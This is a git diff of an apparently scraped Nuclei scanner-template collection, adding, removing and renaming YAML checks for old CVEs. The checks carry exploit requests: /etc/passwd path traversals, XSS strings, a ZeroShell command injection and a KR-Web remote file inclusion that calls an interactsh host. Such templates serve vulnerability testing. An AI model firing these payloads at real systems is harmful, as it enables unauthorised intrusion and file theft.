CVE-2024-7560.yaml | +| CVE-2024-38693.yaml | +| CVE-2024-6824.yaml | +| CVE-2024-6869.yaml | +| CVE-2024-5975.yaml | +| CVE-2024-6254.yaml | +| CVE-2024-39656.yaml | +| CVE-2024-7561.yaml | +| CVE-2024-5668.yaml | +| CVE-2024-7548.yaml | +| CVE-2024-39663.yaml | +| CVE-2024-39668.yaml | +| CVE-2024-39661.yaml | +| CVE-2024-39649.yaml | +| CVE-2024-39653.yaml | +| CVE-2024-39665.yaml | +| CVE-2024-7486.yaml | +| CVE-2024-39643.yaml | +| CVE-2024-5226.yaml | +| CVE-2024-6552.yaml | +| CVE-2024-7150.yaml | +| CVE-2024-5057.yaml | +| CVE-2024-39651.yaml | +| CVE-2024-7008.yaml | +| CVE-2024-41628.yaml | +| CVE-2024-39660.yaml | +| CVE-2024-39652.yaml | +| CVE-2024-39648.yaml | +| CVE-2024-39658.yaml | +| CVE-2024-7492.yaml | +| CVE-2024-39641.yaml | +| CVE-2024-40422.yaml | +| CVE-2024-39655.yaml | +| CVE-2024-39647.yaml | +| CVE-2024-7350.yaml | +| CVE-2024-39664.yaml | +| CVE-2024-39659.yaml | +| CVE-2024-39642.yaml | diff --git a/data.json b/data.json index a3d5c2609a..d36989bb5f 100644 --- a/data.json +++ b/data.json @@ -152,5 +152,6 @@ "2024-08-05": 40712, "2024-08-06": 40706, "2024-08-07": 40721, - "2024-08-08": 40790 + "2024-08-08": 40790, + "2024-08-09": 40887 } \ No newline at end of file diff --git a/data1.json b/data1.json index 27414993ad..c3f6445e77 100644 --- a/data1.json +++ b/data1.json @@ -48365,5 +48365,106 @@ "CVE-2024-7353.yaml": "2024-08-08 02:14:27", "CVE-2022-1617.yaml": "2024-08-08 02:14:27", "cve-2021-32030.yaml": "2024-08-08 02:14:27", - "cve-2021-28918.yaml": "2024-08-08 02:14:27" + "cve-2021-28918.yaml": "2024-08-08 02:14:27", + "sysaid-help-desk.yaml": "2024-08-09 02:15:51", + "帆软数据决策系统.yaml": "2024-08-09 02:15:51", + "dahua-智慧园区综合管理平台.yaml": "2024-08-09 02:15:51", + "panabit-panalog.yaml": "2024-08-09 02:15:51", + "天问物业erp系统.yaml": "2024-08-09 02:15:51", + "致远a8n.yaml": "2024-08-09 02:15:51", + "tin-canny-learndash-reporting.yaml": "2024-08-09 02:15:51", + "东方通tongweb应用服务器.yaml": "2024-08-09 02:15:51", + "金蝶apusic应用服务器.yaml": "2024-08-09 02:15:51", + "致远a6s协同管理软件.yaml": "2024-08-09 02:15:51", + "大华智能物联icc综合管理平台.yaml": "2024-08-09 02:15:51", + "瑞友应用虚拟化系统.yaml": "2024-08-09 02:15:51", + "news-flash.yaml": "2024-08-09 02:15:51", + "inspur-政务系统.yaml": "2024-08-09 02:15:51", + "tos.yaml": "2024-08-09 02:15:51", + "宇视vs-isc5000-e.yaml": "2024-08-09 02:15:51", + "拓尔思was.yaml": "2024-08-09 02:15:51", + "multipurpose.yaml": "2024-08-09 02:15:51", + "企望制造erp系统.yaml": "2024-08-09 02:15:51", + "奥威亚视屏云平台.yaml": "2024-08-09 02:15:51", + "dokmee ecm.yaml": "2024-08-09 02:15:51", + "netflow-analyzer-zoho-traffic-management.yaml": "2024-08-09 02:15:51", + "the-next.yaml": "2024-08-09 02:15:51", + "帆软报表.yaml": "2024-08-09 02:15:51", + "apollo-adminservice.yaml": "2024-08-09 02:15:51", + "kubio.yaml": "2024-08-09 02:15:51", + "kingdee-eas.yaml": "2024-08-09 02:15:51", + "致远a6-s协同管理软件.yaml": "2024-08-09 02:15:51", + "h3c secpath 运维审计系统.yaml": "2024-08-09 02:15:51", + "Cache_to_xss.yaml": "2024-08-09 02:15:51", + "致远协创a6协同办公软件.yaml": "2024-08-09 02:15:51", + "海翔云平台.yaml": "2024-08-09 02:15:51", + "泛普建筑工程施工oa.yaml": "2024-08-09 02:15:51", + "致远g6-n多组织版.yaml": "2024-08-09 02:15:51", + "nagios-status-page-3.yaml": "2024-08-09 02:15:51", + "readynas_surveillance.yaml": "2024-08-09 02:15:51", + "广联达oa.yaml": "2024-08-09 02:15:51", + "致远a8-v5协同管理软件.yaml": "2024-08-09 02:15:51", + "用友致远a6协同办公软件.yaml": "2024-08-09 02:15:51", + "铭飞mcms.yaml": "2024-08-09 02:15:51", + "linkerd-service-detect.yaml": "2024-08-09 02:15:51", + "云时空社会化商业erp系统.yaml": "2024-08-09 02:15:51", + "casbin.yaml": "2024-08-09 02:15:51", + "致远g6-sc多组织版.yaml": "2024-08-09 02:15:51", + "微宏oa.yaml": "2024-08-09 02:15:51", + "tamronos iptv系统.yaml": "2024-08-09 02:15:51", + "kingdee产品.yaml": "2024-08-09 02:15:51", + "致远a6-m协同管理软件.yaml": "2024-08-09 02:15:51", + "orchid-store.yaml": "2024-08-09 02:15:51", + "拓尔思sso.yaml": "2024-08-09 02:15:51", + "慧点oa.yaml": "2024-08-09 02:15:51", + "cf7-message-filter.yaml": "2024-08-09 02:15:51", + "指掌易.yaml": "2024-08-09 02:15:51", + "泛微-oa e-cology8.yaml": "2024-08-09 02:15:51", + "openrefine.yaml": "2024-08-09 02:15:51", + "vmware-vsphere-web-client.yaml": "2024-08-09 02:15:51", + "致远a8-m企业集团版.yaml": "2024-08-09 02:15:51", + "officeweb365.yaml": "2024-08-09 02:15:51", + "用友-fe协作办公平台.yaml": "2024-08-09 02:15:51", + "汉得srm云平台.yaml": "2024-08-09 02:15:51", + "cve-2017-7615.yaml": "2024-08-09 02:15:51", + "CVE-2024-39646.yaml": "2024-08-09 02:15:51", + "CVE-2024-6987.yaml": "2024-08-09 02:15:51", + "CVE-2024-7560.yaml": "2024-08-09 02:15:51", + "CVE-2024-38693.yaml": "2024-08-09 02:15:51", + "CVE-2024-6824.yaml": "2024-08-09 02:15:51", + "CVE-2024-6869.yaml": "2024-08-09 02:15:51", + "CVE-2024-5975.yaml": "2024-08-09 02:15:51", + "CVE-2024-6254.yaml": "2024-08-09 02:15:51", + "CVE-2024-39656.yaml": "2024-08-09 02:15:51", + "CVE-2024-7561.yaml": "2024-08-09 02:15:51", + "CVE-2024-5668.yaml": "2024-08-09 02:15:51", + "CVE-2024-7548.yaml": "2024-08-09 02:15:51", + "CVE-2024-39663.yaml": "2024-08-09 02:15:51", + "CVE-2024-39668.yaml": "2024-08-09 02:15:51", + "CVE-2024-39661.yaml": "2024-08-09 02:15:51", + "CVE-2024-39649.yaml": "2024-08-09 02:15:51", + "CVE-2024-39653.yaml": "2024-08-09 02:15:51", + "CVE-2024-39665.yaml": "2024-08-09 02:15:51", + "CVE-2024-7486.yaml": "2024-08-09 02:15:51", + "CVE-2024-39643.yaml": "2024-08-09 02:15:51", + "CVE-2024-5226.yaml": "2024-08-09 02:15:51", + "CVE-2024-6552.yaml": "2024-08-09 02:15:51", + "CVE-2024-7150.yaml": "2024-08-09 02:15:51", + "CVE-2024-5057.yaml": "2024-08-09 02:15:51", + "CVE-2024-39651.yaml": "2024-08-09 02:15:51", + "CVE-2024-7008.yaml": "2024-08-09 02:15:51", + "CVE-2024-41628.yaml": "2024-08-09 02:15:51", + "CVE-2024-39660.yaml": "2024-08-09 02:15:51", + "CVE-2024-39652.yaml": "2024-08-09 02:15:51", + "CVE-2024-39648.yaml": "2024-08-09 02:15:51", + "CVE-2024-39658.yaml": "2024-08-09 02:15:51", + "CVE-2024-7492.yaml": "2024-08-09 02:15:51", + "CVE-2024-39641.yaml": "2024-08-09 02:15:51", + "CVE-2024-40422.yaml": "2024-08-09 02:15:51", + "CVE-2024-39655.yaml": "2024-08-09 02:15:51", + "CVE-2024-39647.yaml": "2024-08-09 02:15:51", + "CVE-2024-7350.yaml": "2024-08-09 02:15:51", + "CVE-2024-39664.yaml": "2024-08-09 02:15:51", + "CVE-2024-39659.yaml": "2024-08-09 02:15:51", + "CVE-2024-39642.yaml": "2024-08-09 02:15:51" } \ No newline at end of file diff --git a/links.csv b/links.csv index 420b00ad22..3a6ff5c7d0 100644 --- a/links.csv +++ b/links.csv @@ -437,3 +437,4 @@ https://github.com/aredspy/CVE-2021-41182-Tester https://github.com/fa-rrel/My-best-templates https://github.com/ahisec/nuclei-tps https://github.com/OctaYus/NucleiTemplates +https://github.com/rishikesh-j/Nuclei-Templates-Scrapped diff --git a/nuclei-templates/CVE-2000/CVE-2000-0114.yaml b/nuclei-templates/CVE-2000/CVE-2000-0114.yaml new file mode 100644 index 0000000000..ecff9b7b80 --- /dev/null +++ b/nuclei-templates/CVE-2000/CVE-2000-0114.yaml @@ -0,0 +1,32 @@ +id: CVE-2000-0114 + +info: + name: Microsoft FrontPage Extensions Check (shtml.dll) + author: r3naissance + severity: low + description: Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2000-0114 + - https://www.exploit-db.com/exploits/19897 + classification: + cve-id: CVE-2000-0114 + remediation: Upgrade to the latest version. + tags: cve,cve2000,frontpage,microsoft,edb + +requests: + - method: GET + path: + - '{{BaseURL}}/_vti_inf.html' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - "_vti_bin/shtml.dll" + +# Enhanced by mp on 2022/01/27 diff --git a/nuclei-templates/CVE-2000/cve-2000-0114.yaml b/nuclei-templates/CVE-2000/cve-2000-0114.yaml deleted file mode 100644 index 0050d0c90c..0000000000 --- a/nuclei-templates/CVE-2000/cve-2000-0114.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2000-0114 - -info: - name: Microsoft FrontPage Extensions Check (shtml.dll) - author: r3naissance - severity: low - description: Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2000-0114 - - https://www.exploit-db.com/exploits/19897 - classification: - cve-id: CVE-2000-0114 - remediation: Upgrade to the latest version. - tags: cve,cve2000,frontpage,microsoft - -requests: - - method: GET - path: - - '{{BaseURL}}/_vti_inf.html' - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: body - words: - - "_vti_bin/shtml.dll" - -# Enhanced by mp on 2022/01/27 diff --git a/nuclei-templates/CVE-2006/CVE-2006-1681.yaml b/nuclei-templates/CVE-2006/CVE-2006-1681.yaml deleted file mode 100644 index 283b857a26..0000000000 --- a/nuclei-templates/CVE-2006/CVE-2006-1681.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2006-1681 - -info: - name: Cherokee HTTPD <=0.5 - Cross-Site Scripting - author: geeknik - severity: medium - description: Cherokee HTTPD 0.5 and earlier contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated. - reference: - - http://web.archive.org/web/20210217161726/https://www.securityfocus.com/bid/17408/ - - http://web.archive.org/web/20140803090438/http://secunia.com/advisories/19587/ - - http://www.vupen.com/english/advisories/2006/1292 - - https://nvd.nist.gov/vuln/detail/CVE-2006-1681 - classification: - cve-id: CVE-2006-1681 - tags: cherokee,httpd,xss,cve,cve2006 - -requests: - - method: GET - path: - - "{{BaseURL}}/%2F..%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "" - - - type: word - part: header - words: - - text/html - -# Enhanced by mp on 2022/08/12 diff --git a/nuclei-templates/CVE-2006/cve-2006-1681.yaml b/nuclei-templates/CVE-2006/cve-2006-1681.yaml new file mode 100644 index 0000000000..56aacf1327 --- /dev/null +++ b/nuclei-templates/CVE-2006/cve-2006-1681.yaml @@ -0,0 +1,34 @@ +id: CVE-2006-1681 + +info: + name: Cherokee HTTPD <=0.5 XSS + author: geeknik + severity: medium + description: Cross-site scripting (XSS) vulnerability in Cherokee HTTPD 0.5 and earlier allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated. + reference: + - https://www.securityfocus.com/bid/17408 + - https://nvd.nist.gov/vuln/detail/CVE-2006-1681 + - http://secunia.com/advisories/19587 + - http://www.securityfocus.com/bid/17408 + classification: + cve-id: CVE-2006-1681 + tags: cherokee,httpd,xss,cve,cve2006 + +requests: + - method: GET + path: + - "{{BaseURL}}/%2F..%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "" + + - type: word + part: header + words: + - text/html diff --git a/nuclei-templates/CVE-2007/cve-2007-5728.yaml b/nuclei-templates/CVE-2007/CVE-2007-5728.yaml similarity index 100% rename from nuclei-templates/CVE-2007/cve-2007-5728.yaml rename to nuclei-templates/CVE-2007/CVE-2007-5728.yaml diff --git a/nuclei-templates/CVE-2008/CVE-2008-2398.yaml b/nuclei-templates/CVE-2008/CVE-2008-2398.yaml deleted file mode 100644 index 1f91e0a6b6..0000000000 --- a/nuclei-templates/CVE-2008/CVE-2008-2398.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2008-2398 - -info: - name: AppServ Open Project <=2.5.10 - Cross-Site Scripting - author: unstabl3 - severity: medium - description: AppServ Open Project 2.5.10 and earlier contains a cross-site scripting vulnerability in index.php which allows remote attackers to inject arbitrary web script or HTML via the appservlang parameter. - reference: - - https://exchange.xforce.ibmcloud.com/vulnerabilities/42546 - - http://web.archive.org/web/20210121181851/https://www.securityfocus.com/bid/29291/ - - http://web.archive.org/web/20140724110348/http://secunia.com/advisories/30333/ - - http://securityreason.com/securityalert/3896 - - https://nvd.nist.gov/vuln/detail/CVE-2008-2398 - classification: - cve-id: CVE-2008-2398 - tags: cve,cve2008,xss - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "" - part: body - - - type: word - words: - - "text/html" - part: header - -# Enhanced by mp on 2022/08/12 diff --git a/nuclei-templates/CVE-2008/cve-2008-2650.yaml b/nuclei-templates/CVE-2008/CVE-2008-2650.yaml similarity index 100% rename from nuclei-templates/CVE-2008/cve-2008-2650.yaml rename to nuclei-templates/CVE-2008/CVE-2008-2650.yaml diff --git a/nuclei-templates/CVE-2008/CVE-2008-4668.yaml b/nuclei-templates/CVE-2008/CVE-2008-4668.yaml deleted file mode 100644 index 82ec98c146..0000000000 --- a/nuclei-templates/CVE-2008/CVE-2008-4668.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2008-4668 - -info: - name: Joomla! Component imagebrowser 0.1.5 rc2 - Directory Traversal - author: daffainfo - severity: high - description: Directory traversal vulnerability in the Image Browser (com_imagebrowser) 0.1.5 component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/6618 - - https://www.cvedetails.com/cve/CVE-2008-4668 - - http://web.archive.org/web/20210121183742/https://www.securityfocus.com/bid/31458/ - - http://securityreason.com/securityalert/4464 - classification: - cve-id: CVE-2008-4668 - tags: cve,cve2008,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_imagebrowser&folder=../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2008/CVE-2008-6080.yaml b/nuclei-templates/CVE-2008/CVE-2008-6080.yaml deleted file mode 100644 index 1384c89375..0000000000 --- a/nuclei-templates/CVE-2008/CVE-2008-6080.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2008-6080 - -info: - name: Joomla! Component ionFiles 4.4.2 - File Disclosure - author: daffainfo - severity: high - description: Directory traversal vulnerability in download.php in the ionFiles (com_ionfiles) 4.4.2 component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. - reference: - - https://www.exploit-db.com/exploits/6809 - - https://www.cvedetails.com/cve/CVE-2008-6080 - - http://secunia.com/advisories/32377 - - http://web.archive.org/web/20210121184101/https://www.securityfocus.com/bid/31877/ - classification: - cve-id: CVE-2008-6080 - tags: cve,cve2008,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2008/cve-2008-2398.yaml b/nuclei-templates/CVE-2008/cve-2008-2398.yaml new file mode 100644 index 0000000000..367edc8dbf --- /dev/null +++ b/nuclei-templates/CVE-2008/cve-2008-2398.yaml @@ -0,0 +1,35 @@ +id: CVE-2008-2398 + +info: + name: AppServ Open Project 2.5.10 and earlier XSS + author: unstabl3 + severity: medium + description: Cross-site scripting (XSS) vulnerability in index.php in AppServ Open Project 2.5.10 and earlier allows remote attackers to inject arbitrary web script or HTML via the appservlang parameter. + reference: + - https://exchange.xforce.ibmcloud.com/vulnerabilities/42546 + - http://www.securityfocus.com/bid/29291 + - http://secunia.com/advisories/30333 + - http://securityreason.com/securityalert/3896 + classification: + cve-id: CVE-2008-2398 + tags: cve,cve2008,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "" + part: body + + - type: word + words: + - "text/html" + part: header diff --git a/nuclei-templates/CVE-2008/cve-2008-4668.yaml b/nuclei-templates/CVE-2008/cve-2008-4668.yaml new file mode 100644 index 0000000000..d14e0a3b1e --- /dev/null +++ b/nuclei-templates/CVE-2008/cve-2008-4668.yaml @@ -0,0 +1,31 @@ +id: CVE-2008-4668 + +info: + name: Joomla! Component imagebrowser 0.1.5 rc2 - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Image Browser (com_imagebrowser) 0.1.5 component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/6618 + - https://www.cvedetails.com/cve/CVE-2008-4668 + - http://www.securityfocus.com/bid/31458 + - http://securityreason.com/securityalert/4464 + classification: + cve-id: CVE-2008-4668 + tags: cve,cve2008,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_imagebrowser&folder=../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2008/cve-2008-6080.yaml b/nuclei-templates/CVE-2008/cve-2008-6080.yaml new file mode 100644 index 0000000000..7ce462f492 --- /dev/null +++ b/nuclei-templates/CVE-2008/cve-2008-6080.yaml @@ -0,0 +1,31 @@ +id: CVE-2008-6080 + +info: + name: Joomla! Component ionFiles 4.4.2 - File Disclosure + author: daffainfo + severity: high + description: Directory traversal vulnerability in download.php in the ionFiles (com_ionfiles) 4.4.2 component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. + reference: + - https://www.exploit-db.com/exploits/6809 + - https://www.cvedetails.com/cve/CVE-2008-6080 + - http://secunia.com/advisories/32377 + - http://www.securityfocus.com/bid/31877 + classification: + cve-id: CVE-2008-6080 + tags: cve,cve2008,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2009/CVE-2009-0545.yaml b/nuclei-templates/CVE-2009/CVE-2009-0545.yaml index 7f00ae437c..53e183ebd4 100644 --- a/nuclei-templates/CVE-2009/CVE-2009-0545.yaml +++ b/nuclei-templates/CVE-2009/CVE-2009-0545.yaml @@ -1,20 +1,19 @@ id: CVE-2009-0545 - info: name: ZeroShell <= 1.0beta11 Remote Code Execution author: geeknik description: cgi-bin/kerbynet in ZeroShell 1.0beta11 and earlier allows remote attackers to execute arbitrary commands via shell metacharacters in the type parameter in a NoAuthREQ x509List action. reference: https://www.exploit-db.com/exploits/8023 severity: critical + classification: + cve-id: CVE-2009-0545 tags: cve,cve2009,zeroshell,kerbynet,rce - requests: - method: GET path: - "{{BaseURL}}/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22" - matchers: - type: regex part: body regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" diff --git a/nuclei-templates/CVE-2009/cve-2009-0932.yaml b/nuclei-templates/CVE-2009/CVE-2009-0932.yaml similarity index 100% rename from nuclei-templates/CVE-2009/cve-2009-0932.yaml rename to nuclei-templates/CVE-2009/CVE-2009-0932.yaml diff --git a/nuclei-templates/CVE-2009/CVE-2009-1496.yaml b/nuclei-templates/CVE-2009/CVE-2009-1496.yaml deleted file mode 100644 index 51ca80e5ee..0000000000 --- a/nuclei-templates/CVE-2009/CVE-2009-1496.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2009-1496 - -info: - name: Joomla! Component Cmimarketplace - 'viewit' Directory Traversal - author: daffainfo - severity: high - description: Directory traversal vulnerability in the Cmi Marketplace (com_cmimarketplace) component 0.1 for Joomla! allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/8367 - - https://www.cvedetails.com/cve/CVE-2009-1496 - - http://web.archive.org/web/20210121190149/https://www.securityfocus.com/bid/34431/ - - http://www.securityfocus.com/bid/34431 - classification: - cve-id: CVE-2009-1496 - tags: cve,cve2009,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2009/CVE-2009-1558.yaml b/nuclei-templates/CVE-2009/CVE-2009-1558.yaml deleted file mode 100644 index 7a8af924bc..0000000000 --- a/nuclei-templates/CVE-2009/CVE-2009-1558.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2009-1558 - -info: - name: Linksys WVC54GCA 1.00R22/1.00R24 (Wireless-G) - Directory Traversal - author: daffainfo - severity: high - description: Directory traversal vulnerability in adm/file.cgi on the Cisco Linksys WVC54GCA wireless video camera with firmware 1.00R22 and 1.00R24 allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter. - reference: - - https://www.exploit-db.com/exploits/32954 - - https://web.archive.org/web/20210119151410/http://www.securityfocus.com/bid/34713 - - http://www.vupen.com/english/advisories/2009/1173 - - http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-3/ - classification: - cve-id: CVE-2009-1558 - tags: cve,cve2009,iot,lfi,linksys,camera,cisco,firmware,traversal - -requests: - - method: GET - path: - - "{{BaseURL}}/adm/file.cgi?next_file=%2fetc%2fpasswd" - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2009/CVE-2009-2100.yaml b/nuclei-templates/CVE-2009/CVE-2009-2100.yaml deleted file mode 100644 index 71625701ca..0000000000 --- a/nuclei-templates/CVE-2009/CVE-2009-2100.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2009-2100 - -info: - name: Joomla! Component com_Projectfork 2.0.10 - Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in the JoomlaPraise Projectfork (com_projectfork) component 2.0.10 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/8946 - - https://www.cvedetails.com/cve/CVE-2009-2100 - - http://web.archive.org/web/20210121191226/https://www.securityfocus.com/bid/35378/ - - http://www.securityfocus.com/bid/35378 - classification: - cve-id: CVE-2009-2100 - tags: cve,cve2009,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_projectfork§ion=../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2009/CVE-2009-3053.yaml b/nuclei-templates/CVE-2009/CVE-2009-3053.yaml deleted file mode 100644 index 9457d3a08b..0000000000 --- a/nuclei-templates/CVE-2009/CVE-2009-3053.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2009-3053 - -info: - name: Joomla! Component Agora 3.0.0b (com_agora) - Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in the Agora (com_agora) component 3.0.0b for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the action parameter to the avatars page, reachable through index.php. - reference: - - https://www.exploit-db.com/exploits/9564 - - https://www.cvedetails.com/cve/CVE-2009-3053 - - https://web.archive.org/web/20210120183330/https://www.securityfocus.com/bid/36207/ - - https://exchange.xforce.ibmcloud.com/vulnerabilities/52964 - classification: - cve-id: CVE-2009-3053 - tags: cve,cve2009,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2009/cve-2009-3318.yaml b/nuclei-templates/CVE-2009/CVE-2009-3318.yaml similarity index 100% rename from nuclei-templates/CVE-2009/cve-2009-3318.yaml rename to nuclei-templates/CVE-2009/CVE-2009-3318.yaml diff --git a/nuclei-templates/CVE-2009/CVE-2009-4202.yaml b/nuclei-templates/CVE-2009/CVE-2009-4202.yaml deleted file mode 100644 index 1dc7847bd9..0000000000 --- a/nuclei-templates/CVE-2009/CVE-2009-4202.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2009-4202 - -info: - name: Joomla! Omilen Photo Gallery 0.5b - Local File Inclusion - author: daffainfo - severity: high - description: Joomla! Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/8870 - - http://www.vupen.com/english/advisories/2009/1494 - - https://nvd.nist.gov/vuln/detail/CVE-2009-4202 - - http://web.archive.org/web/20210121191031/https://www.securityfocus.com/bid/35201/ - classification: - cve-id: CVE-2009-4202 - tags: cve,cve2009,joomla,lfi,photo - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/06/08 diff --git a/nuclei-templates/CVE-2009/CVE-2009-4223.yaml b/nuclei-templates/CVE-2009/CVE-2009-4223.yaml new file mode 100644 index 0000000000..0d94841eb8 --- /dev/null +++ b/nuclei-templates/CVE-2009/CVE-2009-4223.yaml @@ -0,0 +1,28 @@ +id: CVE-2009-4223 + +info: + name: KR-Web <= 1.1b2 RFI + description: KR is a web content-server based on Apache-PHP-MySql technology which gives to programmers some PHP classes simplifying database content access. Additionally, it gives some admin and user tools to write, hierarchize, and authorize contents. + reference: + - https://sourceforge.net/projects/krw/ + - https://www.exploit-db.com/exploits/10216 + author: geeknik + severity: high + classification: + cve-id: CVE-2009-4223 + tags: cve,cve2009,krweb,rfi + +requests: + - method: GET + path: + - "{{BaseURL}}/adm/krgourl.php?DOCUMENT_ROOT=http://{{interactsh-url}}" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + part: interactsh_protocol + words: + - "http" diff --git a/nuclei-templates/CVE-2009/CVE-2009-4679.yaml b/nuclei-templates/CVE-2009/CVE-2009-4679.yaml deleted file mode 100644 index 940a03d194..0000000000 --- a/nuclei-templates/CVE-2009/CVE-2009-4679.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2009-4679 - -info: - name: Joomla! Portfolio Nexus - Remote File Inclusion - author: daffainfo - severity: high - description: | - Joomla! Portfolio Nexus 1.5 contains a remote file inclusion vulnerability in the inertialFATE iF (com_if_nexus) component that allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/33440 - - https://www.cvedetails.com/cve/CVE-2009-4679 - - https://nvd.nist.gov/vuln/detail/CVE-2009-4679 - - http://secunia.com/advisories/37760 - classification: - cve-id: CVE-2009-4679 - tags: cve,cve2009,joomla,lfi,nexus - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/06/08 diff --git a/nuclei-templates/CVE-2009/cve-2009-1496.yaml b/nuclei-templates/CVE-2009/cve-2009-1496.yaml new file mode 100644 index 0000000000..96796ca27b --- /dev/null +++ b/nuclei-templates/CVE-2009/cve-2009-1496.yaml @@ -0,0 +1,30 @@ +id: CVE-2009-1496 + +info: + name: Joomla! Component Cmimarketplace - 'viewit' Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Cmi Marketplace (com_cmimarketplace) component 0.1 for Joomla! allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/8367 + - https://www.cvedetails.com/cve/CVE-2009-1496 + - http://www.securityfocus.com/bid/34431 + classification: + cve-id: CVE-2009-1496 + tags: 